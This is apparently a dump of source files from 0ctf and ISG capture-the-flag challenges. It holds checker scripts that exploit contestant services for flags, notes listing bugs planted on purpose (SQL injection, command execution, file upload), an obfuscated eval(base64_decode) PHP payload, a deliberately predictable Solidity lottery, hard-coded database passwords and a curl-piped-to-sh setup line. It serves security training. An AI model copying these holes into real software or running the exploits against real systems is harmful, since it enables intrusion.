9 | 10 | def getTabs(): 11 | return json.loads(requests.get("http://127.0.0.1:9222/json").text) 12 | 13 | def openTab(fname): 14 | requests.get("http://127.0.0.1:9222/json/new?"+base_url+fname) 15 | 16 | def closeTab(id): 17 | requests.get("http://127.0.0.1:9222/json/close/"+id) 18 | 19 | def closeAll(data): 20 | for i in data: 21 | if i['id'] == 'cd201794-aaf2-44bf-b960-79e369765a7f': 22 | continue 23 | else: 24 | closeTab(i['id']) 25 | 26 | def getHtml(): 27 | l = [] 28 | for rt, dirs, files in os.walk(data_dir): 29 | for f in files: 30 | if f.endswith('.html'): 31 | l.append(f) 32 | return l 33 | 34 | def moveFile(fname): 35 | shutil.move(data_dir+fname, backup_dir) 36 | 37 | def process(fname): 38 | print(fname) 39 | openTab(fname) 40 | time.sleep(3) 41 | closeAll(getTabs()) 42 | moveFile(fname) 43 | 44 | while True: 45 | try: 46 | files = getHtml() 47 | for i in files: 48 | process(i) 49 | time.sleep(5) 50 | except Exception as e: 51 | print(e) 52 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/rsa_flag.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests, random, string 3 | import rsa 4 | from zeroweapon import oracle 5 | 6 | import sys 7 | reload(sys) 8 | sys.setdefaultencoding('utf-8') 9 | 10 | service = 'z0ne' 11 | timeout = 3 # define timeout here 12 | author = 'md5_salt' # author 13 | 14 | def genRandomLetters(length): 15 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 16 | 17 | def getTeamID(host): 18 | return int(host[8:10]) 19 | 20 | def exploit(host): 21 | port = 8000 22 | with open('private.pem') as privatefile: 23 | p = privatefile.read() 24 | privkey = rsa.PrivateKey.load_pkcs1(p) 25 | nonce = genRandomLetters(8) 26 | teamid = getTeamID(host) 27 | message = str(teamid)+nonce 28 | signature = rsa.sign(message, privkey, 'SHA-1').encode('hex') 29 | 30 | team_flag = requests.get('http://%s:%s/check_flag?teamid=%s&nonce=%s&signature=%s'%(host, port, teamid, nonce, signature)).text 31 | #real_flag = oracle(service, getTeamID(host)) 32 | print team_flag 33 | return team_flag 34 | ''' 35 | if team_flag == real_flag: 36 | return 'OK' 37 | else: 38 | return 'rsa check flag error' 39 | return team_flag 40 | ''' 41 | 42 | 43 | if __name__ == '__main__': 44 | print exploit('100.64.105.11') -------------------------------------------------------------------------------- /0ctf2016-final/checker/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | 8 | 9 | service = 'z0ne' 10 | timeout = 10 # define timeout here 11 | author = 'md5_salt' # author 12 | 13 | 14 | def genRandomLetters(length): 15 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 16 | 17 | def getTeamID(host): 18 | return int(host[8:10]) 19 | 20 | def exploit(host, port): 21 | s = requests.Session() 22 | if 'You are logged in' in s.post('http://%s:%d/login'%(host,port), data={'login-username':'root@5alt.me', 'login-password': 'gsajdg765jh'}).text: 23 | return s.get('http://%s:%d/flag'%(host, port)).text 24 | 25 | 26 | if __name__ == '__main__': 27 | print exploit('100.64.100.11', 8000) 28 | print exploit('100.64.101.11', 8000) 29 | print exploit('100.64.102.11', 8000) 30 | print exploit('100.64.103.11', 8000) 31 | print exploit('100.64.104.11', 8000) 32 | print exploit('100.64.105.11', 8000) 33 | print exploit('100.64.106.11', 8000) 34 | print exploit('100.64.107.11', 8000) 35 | print exploit('100.64.108.11', 8000) 36 | print exploit('100.64.109.11', 8000) 37 | print exploit('100.64.110.11', 8000) 38 | print exploit('100.64.111.11', 8000) 39 | print exploit('100.64.112.11', 8000) 40 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/readme.md: -------------------------------------------------------------------------------- 1 | # ZeroLottery 2 | 3 | Hello guys, welcome to the wonderful ethereum casino. We proudly present our first lottery game, ZeroLottery. Give me your lucky number, chances to get huge amount of money back! Every one can read the code, fair and honest. There is only one small step between you and billionaire. Come to win now! 4 | 5 | ## Attention 6 | Every team has a independent private chain. The password for account `0xAC9E27B1fABd55D3E85104d9FEB945C57d99f43A` is `tctf2018` with 10 ETH. The address of ZeroLottery is `0xb3883b88A48923187A22Ee27d4cb840a4Be68fD3`. We expose a json rpc port(`http://192.168.201.18:80`) of the private chain. 7 | 8 | Your goal is make your ZeroLottery's balance > 500. After that, you can get the flag at `http://192.168.201.18:5000/flag?wallet=` page. 9 | 10 | Read the source code first before have a try! Do not attack the platform! 11 | 12 | Do not make any transactions unless you know what you are doing. Due to mining can be very slow, wait some time(maybe 2 min or more) before making a new transaction. You can not control the miner, so if you think the miner stop working, ask the one who named `md5_salt` for help. DoS can only affect your chain and we would ban your ip. If you run out your ETH, this challenge is over, no refund, just move to other challenges please. 13 | 14 | We suggest you set up a test chain, when you are sure your exploit works, then try it on the challenge . -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/main/index.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | XSS Book 16 | 17 | 18 | 19 | 20 | 21 |
22 |
23 |

XSS Book

24 |

The flag is in http://admin.government.vip:8000

25 |

Bruteforce and scanning are not needed!

26 |

Admin will be hit by your payload

27 |
28 |

Try to find a string $str so that (substr(md5($str), 0, 6) === '').

29 |
30 |
31 | 32 | 34 | 35 | 37 |
38 | 39 |
40 |
41 | 42 | 43 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/run.php: -------------------------------------------------------------------------------- 1 | success_validate($_POST['geetest_challenge'], $_POST['geetest_validate'], $_POST['geetest_seccode'], $user_id); 25 | if ($result) { 26 | //good 27 | } else{ 28 | die('capcha error'); 29 | } 30 | }else{ //服务器宕机,走failback模式 31 | if ($GtSdk->fail_validate($_POST['geetest_challenge'],$_POST['geetest_validate'],$_POST['geetest_seccode'])) { 32 | //good 33 | }else{ 34 | die('capcha error'); 35 | } 36 | } 37 | ?> 38 | 39 | 40 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/README.md: -------------------------------------------------------------------------------- 1 | 安装sendmail 2 | 3 | 第一天lua waf 4 | 第二天直接给源码? 5 | 6 | 7 | 提供重启的接口 8 | 9 | 不能删除root@5alt.me这个用户 10 | 11 | 因为不能改源码,所以需要防止别人读到secret之后直接模拟管理员,每次restart都重置 12 | 13 | 14 | nginx lua用户为nobody 15 | 16 | /etc/sudoers 17 | 18 | nginx ALL=(root) NOPASSWD: /usr/local/openresty/nginx/sbin/nginx -c /usr/local/openresty/nginx/conf/nginx.conf,/usr/local/openresty/nginx/sbin/nginx -s reload,/usr/local/openresty/nginx/sbin/nginx -s stop 19 | 20 | 21 | ctf ALL=(root) NOPASSWD: killall -u z0ne 22 | ctf ALL=(z0ne) NOPASSWD: python /home/z0ne/web.py 23 | 24 | 25 | killall web.py 26 | 27 | 控制权限! 28 | 目录不能可改,只能修改pyc文件和.secret文件 29 | 30 | #洞 31 | secret key重启会变 重启不清除pyc,secretkey被偷了自己想办法改 32 | 因为可能注册@5alt.me的用户,提供删除用户接口,密码checker抓 33 | 34 | xss打管理员! 35 | 36 | 1. debug 37 | 2. check flag没检查id,流量转发 38 | 3. 注册@5alt.me的用户 39 | 4. 任意文件下载(下secret,伪造session) 40 | 5. 任意文件上传(上传secret?写pyc?重启解决。写pyc有用么) 41 | 6. reset password: newpwd处有注入 42 | 7. activate处注入 43 | 8. reg处注入 44 | 9. reg处命令执行 45 | 10. post处注入 删掉 46 | 47 | #安装ngix 48 | https://openresty.org/en/installation.html 49 | 50 | https://github.com/loveshell/ngx_lua_waf 51 | 52 | /usr/local/openresty/nginx/conf 53 | 54 | 55 | lua_package_path "/usr/local/openresty/nginx/conf/waf/?.lua"; 56 | lua_shared_dict limit 10m; 57 | init_by_lua_file /usr/local/openresty/nginx/conf/waf/init.lua; 58 | access_by_lua_file /usr/local/openresty/nginx/conf/waf/waf.lua; 59 | access_log /dev/null; 60 | #error_log /dev/null; 61 | 62 | 63 | location / { 64 | #root html; 65 | #index index.html index.htm; 66 | proxy_pass http://127.0.0.1:8080; 67 | } -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/verify.php: -------------------------------------------------------------------------------- 1 | alert("success!"); location="index.php";'; 14 | die(); 15 | }else{ 16 | echo ''; 17 | die(); 18 | } 19 | } 20 | 21 | ?> 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | Verify 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 50 | 51 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/zerolottery.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.21; 2 | contract ZeroLottery { 3 | struct SeedComponents { 4 | uint component1; 5 | uint component2; 6 | uint component3; 7 | uint component4; 8 | } 9 | 10 | uint private base = 8; 11 | 12 | address private owner; 13 | mapping (address => uint256) public balanceOf; 14 | 15 | function ZeroLottery() public { 16 | owner = msg.sender; 17 | } 18 | 19 | function init() public payable { 20 | balanceOf[msg.sender] = 100; 21 | } 22 | 23 | function seed(SeedComponents components) internal pure returns (uint) { 24 | uint secretSeed = uint256(keccak256( 25 | components.component1, 26 | components.component2, 27 | components.component3, 28 | components.component4 29 | )); 30 | return secretSeed; 31 | } 32 | 33 | function bet(uint guess) public payable { 34 | require(msg.value>1 ether); 35 | require(balanceOf[msg.sender] > 0); 36 | uint secretSeed = seed(SeedComponents((uint)(block.coinbase), block.difficulty, block.gaslimit, block.timestamp)); 37 | uint n = uint(keccak256(uint(msg.sender), secretSeed)) % base; 38 | 39 | if (guess != n) { 40 | balanceOf[msg.sender] = 0; 41 | // charge 0.5 ether for failure 42 | msg.sender.transfer(msg.value - 0.5 ether); 43 | return; 44 | } 45 | // charge 1 ether for success 46 | msg.sender.transfer(msg.value - 1 ether); 47 | balanceOf[msg.sender] = balanceOf[msg.sender] + 100; 48 | } 49 | 50 | function paolu() public payable { 51 | require(msg.sender == owner); 52 | selfdestruct(owner); 53 | } 54 | 55 | } -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/login.php: -------------------------------------------------------------------------------- 1 | alert("fail!"); location="login.php";'; 12 | die(); 13 | } 14 | } 15 | 16 | 17 | ?> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | Signin 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/run.js: -------------------------------------------------------------------------------- 1 | //while sleep 1; do phantomjs --ignore-ssl-errors=true --local-to-remote-url-access=true --web-security=false --ssl-protocol=any xss-bot.js; done; 2 | var system = require('system'); 3 | var url = ''; 4 | if (system.args.length === 1) { 5 | console.log('Ussage: '+phantom.scriptName+' url'); 6 | } else { 7 | url = system.args[1]; 8 | } 9 | 10 | var page = require('webpage').create(); 11 | var timeout = 3000; 12 | 13 | phantom.addCookie({ 14 | 'name' : 'username', /* required property */ 15 | 'value' : 'admin', /* required property */ 16 | 'domain' : 'admin.government.vip', 17 | 'path' : '/', /* required property */ 18 | 'httponly' : false, 19 | 'secure' : false, 20 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 21 | }); 22 | phantom.addCookie({ 23 | 'name' : '2333', /* required property */ 24 | 'value' : '233333', /* required property */ 25 | 'domain' : 'admin.government.vip', 26 | 'path' : '/', /* required property */ 27 | 'httponly' : true, 28 | 'secure' : false, 29 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 30 | }); 31 | 32 | 33 | page.settings.userAgent = "Mozilla/5.0 Chrome for 0ctf2017 by md5_salt"; 34 | page.settings.XSSAuditingEnabled = true 35 | 36 | page.onConsoleMessage = function(msg) { 37 | console.log(msg); 38 | }; 39 | 40 | page.onNavigationRequested = function(url, type, willNavigate, main) { 41 | console.log("[URL] URL="+url); 42 | }; 43 | 44 | page.settings.resourceTimeout = timeout; 45 | page.onResourceTimeout = function(e) { 46 | setTimeout(function(){ 47 | console.log("[INFO] Timeout") 48 | phantom.exit(); 49 | }, 1); 50 | }; 51 | 52 | page.open(url, function(status) { 53 | console.log("[INFO] rendered page"); 54 | setTimeout(function(){ 55 | console.log("[INFO] Timeout") 56 | phantom.exit(); 57 | }, timeout); 58 | }); 59 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/5alt_admin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | from zeroweapon import oracle 8 | 9 | service = 'z0ne' 10 | timeout = 10 # define timeout here 11 | author = 'md5_salt' # author 12 | 13 | 14 | def genRandomLetters(length): 15 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 16 | 17 | def getTeamID(host): 18 | return int(host[8:10]) 19 | 20 | def exploit(host): 21 | port = 8000 22 | #real_flag = oracle(service, getTeamID(host)) 23 | #这里host应该为mysql的host,改unix_socket 24 | conn = MySQLdb.connect(host=host,user='root',passwd='v8y1qjq9Xx8mDcwd',db='z0ne',charset="utf8")#, unix_socket='/Applications/MAMP/tmp/mysql/mysql.sock') 25 | conn.autocommit(True) 26 | cursor = conn.cursor() 27 | 28 | try: 29 | email = genRandomLetters(8)+'@5alt.me' 30 | password = genRandomLetters(8) 31 | #requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).textprint requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text 32 | if not 'User added' in requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text: 33 | raise Exception("Reg user error") 34 | 35 | sql = "SELECT * FROM users WHERE email = %s" 36 | cursor.execute(sql, [email]) 37 | result = cursor.fetchone() 38 | 39 | secret = result[4] 40 | s = requests.Session() 41 | if not 'activate successfully' in s.post('http://%s:%d/activate'%(host, port), data={'user-email': email, 'secret': secret}).text: 42 | raise Exception("Active user error") 43 | 44 | print s.get('http://%s:%d/flag'%(host, port)).text 45 | 46 | message = 'OK' 47 | except Exception as e: 48 | message = str(e) 49 | 50 | sql = "DELETE FROM users WHERE email = %s" 51 | cursor.execute(sql, [email]) 52 | 53 | return message 54 | 55 | if __name__ == '__main__': 56 | print exploit('100.64.105.11') 57 | 58 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/readme.txt: -------------------------------------------------------------------------------- 1 | vnc上去 2 | google-chrome --incognito --remote-debugging-port=9222 3 | 4 | 8 | 18 | 19 | 20 | cat .htaccess 21 | RewriteEngine on 22 | RewriteRule "^.*b.*" "/a.php" 23 | 24 | 25 | 26 | root@zerobox:/etc/apache2/sites-enabled# cat ssl.conf 27 | 28 | 29 | ServerName www.forestime.net 30 | DocumentRoot /var/www/html1 31 | 32 | AllowOverride All 33 | 34 | 35 | ErrorLog ${APACHE_LOG_DIR}/error.log 36 | CustomLog ${APACHE_LOG_DIR}/access.log combined 37 | 38 | 39 | # SSL Engine Switch: 40 | # Enable/Disable SSL for this virtual host. 41 | SSLEngine on 42 | 43 | SSLCertificateFile /etc/apache2/f.crt 44 | SSLCertificateKeyFile /etc/apache2/f.key 45 | SSLCertificateChainFile /etc/apache2/fc.crt 46 | 47 | 48 | 49 | ServerName router.vip 50 | DocumentRoot /var/www/html 51 | 52 | ErrorLog ${APACHE_LOG_DIR}/error.log 53 | CustomLog ${APACHE_LOG_DIR}/access.log combined 54 | 55 | 56 | # SSL Engine Switch: 57 | # Enable/Disable SSL for this virtual host. 58 | SSLEngine on 59 | 60 | SSLCertificateFile /etc/apache2/router.vip.crt 61 | SSLCertificateKeyFile /etc/apache2/router.vip.key 62 | SSLCertificateChainFile /etc/apache2/root.crt 63 | 64 | 65 | 66 | 67 | # ServerName 202.120.7.204 68 | DocumentRoot /var/www/html1 69 | 70 | ErrorLog ${APACHE_LOG_DIR}/error.log 71 | CustomLog ${APACHE_LOG_DIR}/access.log combined 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/reset_pwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | 8 | service = 'z0ne' 9 | timeout = 10 # define timeout here 10 | author = 'md5_salt' # author 11 | 12 | 13 | def genRandomLetters(length): 14 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 15 | 16 | def getTeamID(host): 17 | return int(host[8:10]) 18 | 19 | def exploit(host): 20 | port = 8000 21 | #这里host应该为mysql的host,改unix_socket 22 | conn = MySQLdb.connect(host=host,user='root',passwd='v8y1qjq9Xx8mDcwd',db='z0ne',charset="utf8")#, unix_socket='/Applications/MAMP/tmp/mysql/mysql.sock') 23 | conn.autocommit(True) 24 | cursor = conn.cursor() 25 | 26 | try: 27 | email = genRandomLetters(8)+'@2333.me' 28 | password = genRandomLetters(8) 29 | if not 'User added' in requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text: 30 | raise Exception("Reg user error") 31 | 32 | sql = "SELECT * FROM users WHERE email = %s" 33 | cursor.execute(sql, [email]) 34 | result = cursor.fetchone() 35 | 36 | secret = result[4] 37 | s = requests.Session() 38 | data = s.post('http://%s:%d/activate'%(host, port), data={'user-email': email, 'secret': secret}).text 39 | if not 'activate successfully' in data: 40 | print data 41 | raise Exception("Active user error") 42 | 43 | new_password = genRandomLetters(8) 44 | s.post('http://%s:%d/reset_password'%(host, port), data={'user-old-password':password, 'user-new-password':new_password}).text 45 | 46 | if not 'You are logged in' in requests.post('http://%s:%d/login'%(host,port), data={'login-username':email, 'login-password': new_password}).text: 47 | raise Exception("Login error") 48 | 49 | message = 'OK' 50 | except Exception as e: 51 | message = str(e) 52 | 53 | sql = "DELETE FROM users WHERE email = %s" 54 | cursor.execute(sql, [email]) 55 | 56 | return message 57 | 58 | if __name__ == '__main__': 59 | print exploit('100.64.105.11') 60 | 61 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/main/static/i_dont_believe_you_can_guess_this_js.js.php: -------------------------------------------------------------------------------- 1 | // 2 | //while sleep 1; do phantomjs --ignore-ssl-errors=true --local-to-remote-url-access=true --web-security=false --ssl-protocol=any xss-bot.js; done; 3 | var system = require('system'); 4 | var url = ''; 5 | if (system.args.length === 1) { 6 | console.log('Ussage: '+phantom.scriptName+' url'); 7 | } else { 8 | url = system.args[1]; 9 | } 10 | 11 | var page = require('webpage').create(); 12 | var timeout = 3000; 13 | 14 | phantom.addCookie({ 15 | 'name' : 'username', /* required property */ 16 | 'value' : 'admin', /* required property */ 17 | 'domain' : 'admin.government.vip', 18 | 'path' : '/', /* required property */ 19 | 'httponly' : false, 20 | 'secure' : false, 21 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 22 | }); 23 | phantom.addCookie({ 24 | 'name' : 'admin_secret', /* required property */ 25 | 'value' : 'md5_salt_is_the_real_admin', /* required property */ 26 | 'domain' : 'admin.government.vip', 27 | 'path' : '/', /* required property */ 28 | 'httponly' : true, 29 | 'secure' : false, 30 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 31 | }); 32 | 33 | 34 | page.settings.userAgent = "Mozilla/5.0 Chrome for 0ctf2017 by md5_salt"; 35 | page.settings.XSSAuditingEnabled = true 36 | 37 | page.onConsoleMessage = function(msg) { 38 | console.log(msg); 39 | }; 40 | 41 | page.onNavigationRequested = function(url, type, willNavigate, main) { 42 | console.log("[URL] URL="+url); 43 | }; 44 | 45 | page.settings.resourceTimeout = timeout; 46 | page.onResourceTimeout = function(e) { 47 | setTimeout(function(){ 48 | console.log("[INFO] Timeout") 49 | phantom.exit(); 50 | }, 1); 51 | }; 52 | 53 | page.open(url, function(status) { 54 | console.log("[INFO] rendered page"); 55 | setTimeout(function(){ 56 | console.log("[INFO] Timeout") 57 | phantom.exit(); 58 | }, timeout); 59 | }); 60 | -------------------------------------------------------------------------------- /ISG2014/safesite/main/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Safe Site 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 33 | 34 |
35 | 36 |
37 |

Safe Site

38 |

This is a really safe site. No SQLi, no XSS, no CSRF...

39 |

No one can hack it directly, unless you have a dir overflow 0day ;)

40 |

You can you up, no can no BB =, =

41 |

Beat the admin!

42 |

Come on!

43 |
44 |
45 |
46 | 47 | 48 |
49 | 50 |
51 |

52 | 53 |
54 | 55 | 56 | -------------------------------------------------------------------------------- /ISG2014/X-Area/index.php: -------------------------------------------------------------------------------- 1 | "zasada"); 10 | $valid_users = array_keys($valid_passwords); 11 | 12 | $user = @$_SERVER['PHP_AUTH_USER']; 13 | $pass = @$_SERVER['PHP_AUTH_PW']; 14 | 15 | $validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]); 16 | 17 | if (!$validated) { 18 | header('WWW-Authenticate: Basic realm="X-Area"'); 19 | header('HTTP/1.0 401 Unauthorized'); 20 | die ("I don't think you are 'hack.the.life@gmail.com'. Get out!"); 21 | } 22 | 23 | eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKCmZ1bmN0aW9uIGRlY3J5cHQoJGVuY3J5cHRlZCwgJGtleSkKewoJJGtleT1tZDUoJGtleSk7CiAgICAkY2lwaGVydGV4dF9kZWMgPSBwYWNrKCJIKiIsJGVuY3J5cHRlZCk7CiAgICAkbW9kdWxlID0gbWNyeXB0X21vZHVsZV9vcGVuKE1DUllQVF9SSUpOREFFTF8xMjgsICcnLCBNQ1JZUFRfTU9ERV9DQkMsICcnKTsKICAgICRpdiA9IHN1YnN0cihtZDUoJGtleSksMCxtY3J5cHRfZW5jX2dldF9pdl9zaXplKCRtb2R1bGUpKTsKICAgIG1jcnlwdF9nZW5lcmljX2luaXQoJG1vZHVsZSwgJGtleSwgJGl2KTsKICAgICRkZWNyeXB0ZWQgPSBtZGVjcnlwdF9nZW5lcmljKCRtb2R1bGUsICRjaXBoZXJ0ZXh0X2RlYyk7CiAgICBtY3J5cHRfZ2VuZXJpY19kZWluaXQoJG1vZHVsZSk7CiAgICBtY3J5cHRfbW9kdWxlX2Nsb3NlKCRtb2R1bGUpOwogICAgcmV0dXJuIHJ0cmltKCRkZWNyeXB0ZWQsIlwwIik7Cn0KCmlmKEAkX1JFUVVFU1RbJ2tleSddKXsKCSRrZXk9JF9SRVFVRVNUWydrZXknXTsKCWVjaG8gZXZhbCh+J5qcl5Dfmomek9ebmpyNho+L193OyJ2bzZyanp2am8zKns7Pz5mZnJuZyp2bm8bPzpmems7OxsrHypzJncrLyc7Nm8bHz8vMy8jKns6ZxpqdnJvGxsvPx86ZnJ7NnczLx57JzsvMz8jLycrKyprInM2dyMjKzJnPzcadysedz87IxpydzZvOzsidnc/Kmc7My5zNm57NmcnPxp3OzMzMys7OmZzIyMidmZ3PxpzNnMycx8uczZqdxpmcms/Mzp3Gxs7LyczJxpucmc2emsfNy8nJx8mby5qezJmbzcbOycidyciczMzPzMqdncuezcjKmsaanJ3IzsaczMidyc+Zyp2azZnNzZzJxpyazcvGyciam5zOncrGyJ7NxsedmZnGz8qbmZqamsbInsyezciZnpnIxp3Myp7HzMrHx8jPz5mdz8/Kz8vOnJqans3HyJuamcvHnsiemZmdx8zOx52dm8bHmsadnZ2ezcbJm52Zm57Gm8/O3dPf25SahtbWxCcpOwp9ZWxzZXsKCWVjaG8gIkFjY2VzcyBERU5JRUQhIjsKfQ==')); 24 | echo ' 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 |
46 |

Change Phone

47 |

Please use your ip instead of phone
We will send a http request to 80 port with verify code!

48 |
49 |

Try to find a string $str so that (substr(md5($str), 0, 6) === '').

50 |
51 |
52 | 53 | 55 | 56 | 58 |
59 | 60 |
61 |
62 | 63 | 64 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/flag.py: -------------------------------------------------------------------------------- 1 | #coding=utf8 2 | from web3 import Web3, HTTPProvider 3 | import json, re 4 | 5 | from flask import Flask,request 6 | 7 | def get_balance(team, wallet): 8 | port = 8000+team 9 | 10 | contract_addr = '0xb3883b88A48923187A22Ee27d4cb840a4Be68fD3' 11 | token_t_abi = '[ { "constant": true, "inputs": [ { "name": "", "type": "address" } ], "name": "balanceOf", "outputs": [ { "name": "", "type": "uint256", "value": "0" } ], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [ { "name": "guess", "type": "uint256" } ], "name": "bet", "outputs": [], "payable": true, "stateMutability": "payable", "type": "function" }, { "constant": false, "inputs": [], "name": "init", "outputs": [], "payable": true, "stateMutability": "payable", "type": "function" }, { "inputs": [], "payable": false, "stateMutability": "nonpayable", "type": "constructor" } ]' 12 | #wallet_w = wallet#'0xAC9E27B1fABd55D3E85104d9FEB945C57d99f43A' 13 | wallet_w = Web3.toChecksumAddress(wallet.lower())#'0xAC9E27B1fABd55D3E85104d9FEB945C57d99f43A' 14 | 15 | w3 = Web3(HTTPProvider('http://127.0.0.1:%d' % port)) 16 | token = w3.eth.contract( 17 | contract_addr, 18 | abi=json.loads(token_t_abi), 19 | ) 20 | return token.call().balanceOf(wallet_w) 21 | 22 | def ip2team(ip): 23 | ''' 24 | 192.168.100.1 25 | 192.168.101.1 26 | ''' 27 | #return 0 28 | return int(ip.split('.')[2]) - 100 29 | 30 | 31 | app = Flask(__name__) 32 | 33 | @app.route('/') 34 | def index(): 35 | return 'Welcome to ZeroLottery.' 36 | 37 | 38 | @app.route('/flag') 39 | def flag(): 40 | wallet = request.args.get('wallet', '') 41 | if not wallet or not re.match(r'0x[0-9a-fA-F]{32,}', wallet): 42 | return 'bad address format' 43 | 44 | ip = request.remote_addr 45 | team = ip2team(ip) 46 | balance = get_balance(team, wallet) 47 | if balance > 500: 48 | return 'flag{smart_contracts_is_not_so_secure}' 49 | 50 | return 'Your balance is ' + str(balance) 51 | 52 | if __name__ == '__main__': 53 | from tornado.wsgi import WSGIContainer 54 | from tornado.httpserver import HTTPServer 55 | from tornado.ioloop import IOLoop 56 | 57 | http_server = HTTPServer(WSGIContainer(app)) 58 | http_server.listen(5000) 59 | IOLoop.instance().start() 60 | #app.run(debug=True) -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/register.php: -------------------------------------------------------------------------------- 1 | alert("success!"); location="login.php";'; 18 | }else{ 19 | echo ''; 20 | } 21 | die(); 22 | } 23 | ?> 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | Register 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 57 | 58 | -------------------------------------------------------------------------------- /0ctf2016-final/z0ne.sh: -------------------------------------------------------------------------------- 1 | #sh -c "$(curl -fsSL http://100.64.80.11/z0ne.sh)" 2 | 3 | apt-get -qq -y update 4 | 5 | DEBIAN_FRONTEND=noninteractive apt-get -y install mailutils 6 | DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server 7 | mysqladmin -u root password v8y1qjq9Xx8mDcwd 8 | mysql -uroot -pv8y1qjq9Xx8mDcwd -N -B -e "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'v8y1qjq9Xx8mDcwd';" 9 | sed -i "s/127.0.0.1/*/g" /etc/mysql/my.cnf 10 | service mysql restart 11 | 12 | apt-get -y install python-pip 13 | apt-get -y install python-dev libmysqlclient-dev 14 | pip install MySQL-python 15 | pip install rsa 16 | pip install flask 17 | pip install werkzeug==0.10 18 | pip install tornado 19 | 20 | apt-get -y install libreadline-dev libncurses5-dev libpcre3-dev libssl-dev perl make build-essential 21 | 22 | wget https://openresty.org/download/openresty-1.9.7.4.tar.gz 23 | tar xzvf openresty-1.9.7.4.tar.gz 24 | cd /root/openresty-1.9.7.4/ && ./configure 25 | cd /root/openresty-1.9.7.4/ && make 26 | cd /root/openresty-1.9.7.4/ && make install 27 | cd ~ 28 | 29 | /usr/local/openresty/nginx/sbin/nginx 30 | /usr/local/openresty/nginx/sbin/nginx -s stop 31 | 32 | useradd ctf -d /home/ctf -s /bin/bash 33 | useradd z0ne -d /home/z0ne -s /usr/sbin/nologin 34 | 35 | mkdir /home/ctf 36 | chown root:ctf /home/ctf 37 | chmod 770 /home/ctf 38 | 39 | mkdir /home/z0ne 40 | chown root:z0ne /home/z0ne 41 | chmod 770 /home/z0ne 42 | 43 | mkdir /home/ctf/waf/ 44 | chmod 770 /home/ctf/waf/ 45 | chown ctf:ctf /home/ctf/waf/ 46 | touch /home/ctf/waf/init.lua 47 | touch /home/ctf/waf/waf.lua 48 | chown ctf:ctf /home/ctf/waf/init.lua 49 | chown ctf:ctf /home/ctf/waf/waf.lua 50 | chmod 770 /home/ctf/waf/init.lua 51 | chmod 770 /home/ctf/waf/waf.lua 52 | 53 | apt-get install unzip 54 | #wget http://100.64.80.11/z0ne.zip 55 | 56 | unzip z0ne.zip 57 | mv readme.txt /home/ctf/readme.txt 58 | 59 | mysql -uroot -pv8y1qjq9Xx8mDcwd < install.sql 60 | cp nginx.conf /usr/local/openresty/nginx/conf/nginx.conf 61 | cp sudoers /etc/sudoers 62 | cp -r z0ne/* /home/z0ne/ 63 | 64 | chown root:ctf /usr/local/openresty/nginx/conf/nginx.conf 65 | chmod 760 /usr/local/openresty/nginx/conf/nginx.conf 66 | 67 | chown root:z0ne /home/z0ne/uploads/ 68 | chmod 770 /home/z0ne/uploads/ 69 | chmod 750 /home/z0ne/ 70 | 71 | iptables -I INPUT -p tcp --dport 8080 -j DROP 72 | iptables -I INPUT -s 